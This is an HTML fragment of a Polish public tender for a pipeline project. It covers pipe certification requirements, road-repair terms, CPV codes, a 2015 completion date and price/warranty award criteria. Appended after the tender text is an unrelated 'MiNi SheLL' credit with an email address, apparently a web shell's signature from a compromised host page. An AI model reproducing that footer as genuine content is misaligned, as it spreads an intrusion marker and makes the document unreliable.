k)	świadectwo odbioru partii rur zgodne z PN-EN 10204-3.1 z wynikiem testu FNCT  min. 8760 godzin dla każdej partii surowca; 
l)	certyfikat DIN CERTCO lub TUV zgodności ze specyfikacją techniczną PAS1075; 
m)	system jakości zgodny z PN-EN ISO 9001 i PN-EN ISO 14001
n)	wszystkie dokumenty muszą posiadać datę ważności na dzień składania oferty
Rury muszą posiadać możliwość zgrzewania i łączenia bez konieczności zdejmowania warstw ochronnych (pomiędzy poszczególnymi warstwami występują połączenia molekularne uniemożliwiające mechaniczne rozłączenie).
 
4.2)	Rury i kształtki z PEHD od jednego producenta, posiadające system kontroli jakości zgodny z PN-EN ISO 9001, PN-EN14001

4.3)	Szczegółowy zakres robót określają łącznie: Przedmiar robót i Dokumentacja projektowa
Uwagi:
4)	W przedmiarze przyjęto odtworzenie (naprawę) nawierzchni drogowych (patrz też: Plan Nawierzchni) w ilościach niezbędnych dla wykonania wykopów technologicznych przy montażu sieci. W przypadku uszkodzenia podczas prac nawierzchni w ilościach większych, należy je naprawić w 100%, bez względu na ilość podaną w przedmiarze, uwzględniając koszty w ofercie. 
5)	Przedmiar sporządzono na podstawie projektu, z wprowadzeniem, zaakceptowanych przez  autora projektu zmian, polegających na:
- montażu rurociągów z rur trójwarstwowych PE TS SDR 17 PN10;
- zastosowaniu zamiennie jako ochronne w przejściach poprzecznych pod drogami 
  publicznymi, lokalnymi, przepustami w ciągu dróg lokalnych i zjazdami prywatnymi, rur 
  PE 100 PN 10 280 x 16,6 mm w  miejsce projektowanych pierwotnie stalowych.
6)	Roboty należy wykonać zgodnie z decyzjami, warunkami, uzgodnieniami i stanowiskami stanowiącymi Dokumenty formalno - prawne.
Obowiązki związane z wykonywaniem robót budowlanych, wskazane w Dokumentach formalno - prawnych należeć będą do Wykonawcy robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.30.00-2, 45.23.13.00-8, 45.23.31.42-6, 45.33.15.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com